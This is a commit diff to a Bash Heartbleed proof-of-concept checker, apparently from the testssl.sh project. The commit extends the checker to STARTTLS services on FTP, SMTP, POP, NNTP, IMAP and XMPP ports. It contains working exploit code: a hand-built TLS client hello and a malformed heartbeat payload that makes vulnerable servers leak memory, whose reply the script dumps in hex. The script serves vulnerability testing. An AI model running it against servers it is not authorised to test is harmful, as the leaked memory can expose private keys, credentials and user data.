works also for nntp,ftp,imap,pop,xmpp +starttls now

2025-01-06 00:39:44 +01:00 · 2015-07-01 13:01:16 +02:00 · 2015-07-01 13:01:16 +02:00 · 21119d6d01
commit 21119d6d01
parent 83dc3f707f
1 changed files with 96 additions and 67 deletions
--- a/utils/heartbleed.bash
+++ b/utils/heartbleed.bash
@ -10,23 +10,23 @@
 readonly PS4='${LINENO}: ${FUNCNAME[0]:+${FUNCNAME[0]}(): }'
-NODE=""
+[ -z "$1" ] && exit 1
 NODE="$1"
 PORT="443"
 SLEEP=2
 MAXSLEEP=10
 SOCKREPLY=""
 COL_WIDTH=32
 [ -z "$1" ] && exit 1
 # TLS 1.0=x01  1.1=0x02, 1.2=0x3
 # the PoC contains per default only check for TLS1.0 as the is the least common denominator
 TLSV=${2:-01}
 heartbleed_payload="\x18\x03\x$TLSV\x00\x03\x01\x40\x00"
-##                                                   ^^^^^^^ this is the thing!
+##                                              ^^^^^^^ this is the whole thing!
 client_hello="
-# TLS header ( 5 bytes)
+# TLS header (5 bytes)
 ,x16,               # Content type (x16 for handshake)
 x03, x$TLSV,        # TLS Version
 x00, xdc,           # Length
@ -73,12 +73,11 @@ x00, x23, x00, x00,
 # Extension: Heartbeat
 x00, x0f, x00, x01, x01
 "
-msg=`echo "$client_hello" | sed -e 's/# .*$//g' -e 's/,/\\\/g' | sed -e 's/ //g' | tr -d '\n'`
+#msg=`echo "$client_hello" | sed -e 's/# .*$//g' -e 's/,/\\\/g' | sed -e 's/ //g' | tr -d '\n'`
 msg=$(echo "$client_hello" | sed -e 's/# .*$//g' -e 's/ //g' | sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//; /^$/d' | sed 's/,/\\/g' | tr -d '\n')
 parse_hn_port() {
 	NODE="$1"
     # strip "https", supposed it was supplied additionally
     echo $NODE | grep -q 'https://' && NODE=`echo $NODE | sed -e 's/https\:\/\///' `
@ -87,7 +86,6 @@ parse_hn_port() {
     # determine port, supposed it was supplied additionally
     echo $NODE | grep -q ':' && PORT=`echo $NODE | sed 's/^.*\://'` && NODE=`echo $NODE | sed 's/\:.*$//'`
     echo -e "\n===> connecting to $NODE:$PORT\n"
 }
@ -117,12 +115,7 @@ socksend() {
 sockread() {
-	reply=$(dd bs=$1 count=1 <&5 2>/dev/null)
+     [[ "x$2" == "x" ]] && maxsleep=$MAXSLEEP || maxsleep=$2
     wait_kill $! $SLEEP
 }
 sockread1() {
 	[[ "x$2" == "x" ]] && maxsleep=10 || maxsleep=$2
     ret=0
     ddreply=$(mktemp /tmp/ddreply.XXXXXX) || return 7
@ -136,6 +129,7 @@ sockread1() {
 }
 # arg1: string to send
 # arg2: success string, yet to be parsed
 starttls_line0() {
     echo "$1" >&5
     cat <&5 &
@ -152,6 +146,11 @@ starttls_line1() {
     done
 }
 fixme(){
     tput bold; tput setaf 5; echo -e "\n$1\n"; tput sgr0
 }
 fd_socket(){
     if ! exec 5<> /dev/tcp/$NODE/$PORT; then
          echo "`basename $0`: unable to connect to $NODE:$PORT"
@ -159,11 +158,41 @@ fd_socket(){
     fi
     case "$1" in # port
-		25) 	starttls_line0 "EHLO testssl.sh" 
+          21)  # https://tools.ietf.org/html/rfc4217
-			starttls_line0 "STARTTLS" 
+               starttls_line0 "FEAT"
               starttls_line0 "AUTH TLS"
               ;;
          25)  #https://tools.ietf.org/html/rfc4217
               starttls_line0 "EHLO testssl.sh" "250"
               starttls_line0 "STARTTLS" "220"
               ;;
          110) # https://tools.ietf.org/html/rfc2595
               starttls_line0 "STLS" "OK"
               ;;
          119|433) # https://tools.ietf.org/html/rfc4642
               starttls_line0 "CAPABILITIES" "101"
               starttls_line0 "STARTTLS" "382"
               ;;
          143) # https://tools.ietf.org/html/rfc2595 
               starttls_line0 "a001 CAPABILITY" "OK"
               starttls_line0 "a002 STARTTLS" "OK"
               ;;
          389) # https://tools.ietf.org/html/rfc2830, https://tools.ietf.org/html/rfc4511
               fixme "LDAP: FIXME not yet implemented"
               exit 1
               ;;
          674) # https://tools.ietf.org/html/rfc2595
               fixme "ACAP: FIXME not yet implemented"
               exit 1
               ;;
          5222) 
               starttls_line0 "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>" "proceed"
               fixme "XMPP: FIXME not yet implemented"
               ;;
          443|995|993|465|*)  # we don't need a special command here
               ;;
 		443|*)  ;;
     esac
     echo
 }
 close_socket(){
@ -182,12 +211,14 @@ echo "##### sending standard client hello with TLS version 03,$TLSV:"
 socksend "$msg" $TLSV
 sockread 16384 
 #sockread 10000
 echo "##### reading server hello:"
-#cat $SOCKREPLY | xxd | head -20
+echo "$SOCKREPLY" | xxd -c$COL_WIDTH | head -10
 echo -e "$reply" | xxd | head -2
 echo "[...]"
 echo
 if [ 1 -ge $(echo "$SOCKREPLY" | xxd | wc -l) ]; then
     tput bold; tput setaf 5; echo "TLS handshake failed"; tput sgr0
     exit 1
 fi
 echo "###### sending payload with TLS version 03,$TLSV:"
 socksend $heartbleed_payload $TLSV
@ -195,12 +226,10 @@ socksend $heartbleed_payload $TLSV
 sockread 65534
 echo "###### heartbleed reply: "
 echo "============================="
-#cat $SOCKREPLY | xxd | head -20
+echo "$SOCKREPLY" | xxd -c$COL_WIDTH | head -20
 echo -e "$reply" | xxd -c$COL_WIDTH
 echo "============================="
-lines_returned=`echo -e "$reply" | xxd | wc -l`
+if [ $(echo "$SOCKREPLY" | xxd | wc -l) -gt 1 ]; then
 if [ $lines_returned -gt 1 ]; then
     tput bold; tput setaf 1; echo "VULNERABLE"; tput sgr0
     ret=1
 else
@ -213,5 +242,5 @@ close_socket
 exit $ret
-#  vim:tw=100:ts=5:sw=5
+#  vim:tw=100:ts=5:sw=5:expandtab
-#  $Id: heartbleed.bash,v 1.9 2015/07/01 08:12:36 dirkw Exp $ 
+#  $Id: heartbleed.bash,v 1.11 2015/07/01 10:56:57 dirkw Exp $